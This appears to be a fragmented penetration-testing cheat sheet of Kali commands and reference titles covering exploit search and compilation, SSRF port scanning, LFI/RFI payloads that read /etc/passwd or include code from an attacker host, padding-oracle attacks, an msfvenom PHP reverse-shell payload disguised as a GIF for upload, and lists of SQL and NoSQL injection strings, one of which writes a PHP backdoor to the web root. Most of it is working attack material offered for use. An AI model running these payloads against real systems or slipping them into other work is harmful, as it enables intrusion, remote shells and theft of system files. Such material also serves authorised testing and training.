That was the division in the hacking world: There were people who were exploring it and the people who were trying to make money from it. And, generally, you stayed away from anyone who was trying to make money from it.
**— **Jeff Moss
Kali> searchsploit windows 2003 | grep -i local
Google> site:exploit-db.com exploit kernel <= 3
Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*
Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit)
Resources
Cracking the Lens: Attacking HTTPs hidden attack surface
How I hacked hundreds of companies through their helpdesk
Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET
Exploitation: XML External Entity (XXE) Injection
Exploiting a Real-World XXE Vulnerability
Exploiting XXE Vulnerabilities in file parsing
XSS Attack: Busting browsers to root
Resources
Computerphile: Cross Site Request Forgery
Updating Anti-CSRF Tokens with BurpSuite
What is Server side Request Forgery?
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)
Sometimes what appears to be RFI can lead to SSRF, here are some commands to help
# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ
# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ
Resources
Node.js Remote Code Execution as a Service
Exploiting Python code execution in the web
Utilizing Code Re-use or ROP in PHP Exploits
Pwning PHP Mail Function for fun and RCE
Resources
Server Side Template Injection
Server Side Template Injection: RCE for the Modern WebApp
Resources
Local File Inclusion Testing Techniques
Insecure PHP Functions & their Exploits (LFI/RFI)
LFI and RFI -- The Website Security Vulnerability
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts
file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
send post data
expect://whoami
Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt
Automated Padding Oracle Attacks with Padbuster
url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8
-cookies "ENC-COOKIE"
-plaintext '{"user":"admin","role":"admin"}'
Resources
AWS PENETRATION TESTING PART 1. S3 BUCKETS
# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo “FFD8FFEo” | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif
Kali> curl -X POST
-F "field1=test"
-F "file=@/home/user/evil.gif"
http://$TARGET/upload.php
--cookie "cookie"
Resources
How to Bypass E-Mail gateways using common payloads
Resources
An interesting route to domain admin via ISCSI
SQLMap tricks for advanced SQL injeciton
username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'
SQL Injection Cheatsheet MSSQL
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
Resources
Introduction to Telephony and PBX
Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET